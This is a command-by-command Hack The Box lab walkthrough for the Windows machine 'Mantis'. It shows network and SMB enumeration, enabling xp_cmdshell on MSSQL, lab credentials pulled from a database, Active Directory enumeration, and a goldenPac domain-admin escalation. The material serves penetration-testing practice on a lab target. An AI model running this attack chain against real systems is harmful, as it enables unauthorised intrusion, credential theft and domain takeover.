Mantis

HTB Windows

nmap -A -p- -oA mantis 10.129.12.242 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA mantis 10.129.12.242

echo "10.129.12.242 mantis.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA mantis-udp 10.129.12.242

whichSystem 10.129.12.242

nmap -p- --open -T5 -v -n 10.129.12.242

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.12.242 -oG allPorts

extractPorts allPorts

nmap -sCV -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389 10.129.12.242 -oN targeted

rpcclient -U "" 10.129.12.242 -N

crackmapexec smb 10.129.12.242

We add htb.local to /etc/hosts

smbclient -L 10.129.12.242 -N

smbmap -H 10.129.12.242 -u 'null'

cat targeted | grep http | grep tcp | awk '{print $1}'

whatweb http://10.129.12.242:1337

At http://10.129.12.242:8080

gobuster dir -u http://mantis.htb:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60

searchsploit orchard

http://mantis.htb:1337/secure_notes

We click on the txt file

We take part of the URL and base64-decode it

echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -ps -r;

sqsh -S 10.10.10.52 -U admin -P 'm$$ql_S@_P@ssW0rd!'

EXEC SP_CONFIGURE 'show advanced options', 1

reconfigure

go

EXEC SP_CONFIGURE 'xp_cmdshell' , 1

reconfigure

go

xp_cmdshell 'whoami'

go

dbeaver

We choose MSSQL Server

We look in blog_Orchard_Users_UserPartRecord and click the Data tab

Credentials -> james:'J@m3s_P@ssW0rd!'

crackmapexec smb mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!'

rpcclient -U 'james%J@m3s_P@ssW0rd!' mantis.htb -c "enumdomusers"

rpcclient -U 'james%J@m3s_P@ssW0rd!' mantis.htb -c "enumdomgroups"

rpcclient -U 'james%J@m3s_P@ssW0rd!' mantis.htb -c "queryuser james"

ldapdomaindump -u 'htb.local\james' -p 'J@m3s_P@ssW0rd!' mantis.htb

firefox domain_users_by_group.html

crackmapexec winrm mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!'

smbmap -H mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!'

smbmap -H mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!' -r SYSVOL

smbmap -H mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!' -r SYSVOL/htb.local

batcat users.txt

python3 /opt/impacket/examples/GetNPUsers.py htb.local/ -no-pass -usersfile users.txt

python3 /opt/impacket/examples/GetUserSPNs.py htb.local/james@mantis.htb

mkdir bh

cd bh

bloodhound-python -c All -ns mantis.htb -d htb.local -u 'james' -p 'J@m3s_P@ssW0rd!'

neo4j console

bloodhound &> /dev/null & disown

I got an error uploading the JSON files.

We change /etc/hosts

impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'

type c:\users\administrator\desktop\root.txt

© 2024 Cu3rv0x